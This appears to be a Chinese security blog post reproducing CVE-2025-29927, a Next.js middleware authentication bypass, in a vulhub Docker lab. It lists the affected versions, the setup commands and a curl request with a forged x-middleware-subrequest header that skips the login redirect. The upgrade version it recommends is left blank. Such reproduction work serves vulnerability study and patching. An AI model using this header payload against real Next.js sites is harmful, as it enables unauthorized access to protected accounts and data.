本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法
。
Next.js
是由Vercel开发的基于React的现代Web应用框架,具备前后端一体的开发能力,广泛用于开发Server-side Rendering (SSR)和静态站点生成(SSG)项目。Next.js支持传统的Node.js模式和基于边缘计算(Edge Function)的运行模式,后者适用于轻量、高性能的服务逻辑。该漏洞成因是框架中用于标记中间件递归请求的特殊请求头x-middleware-subrequest可被用户伪造,导致中间件处理链被绕过,进而影响基于中间件实现的身份认证、重定向等关键安全逻辑。由于使用该框架的应用较多,如AI应用chatbot-ui,建议受影响的用户根据实际情况评估风险,立即修复此漏洞。
目前受影响的NextJS版本:
11.1.4 < Next.js ≤ 13.5.614.0 < Next.js < 14.2.2515.0 < Next.js < 15.2.3
https://github.com/vulhub/vulhub/blob/master/next.js/CVE-2025-29927/README.zh-cn.md
apt-get update
apt install docker.io -y
docker -v
apt install docker-compose -y
docker-compose -v
git clone https://github.com/vulhub/vulhub.git
cd vulhub-master/next.js/CVE-2025-29927
docker-compose up -d
docker ps -a
在没有登录之前,正常访问根目录是这样的,会跳转到登录界面,
curl -i http://192.168.127.128:3000
添加header,
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
发现绕过了登录验证,直接跳转到了登录后的界面,
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://192.168.127.128:3000
升级Next.js版本为:
https://forum.butian.net/article/679
原文始发于微信公众号(零日安全实验室):漏洞复现篇 | Next.js 中间件鉴权绕过漏洞:CVE-2025-29927,速看!!!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论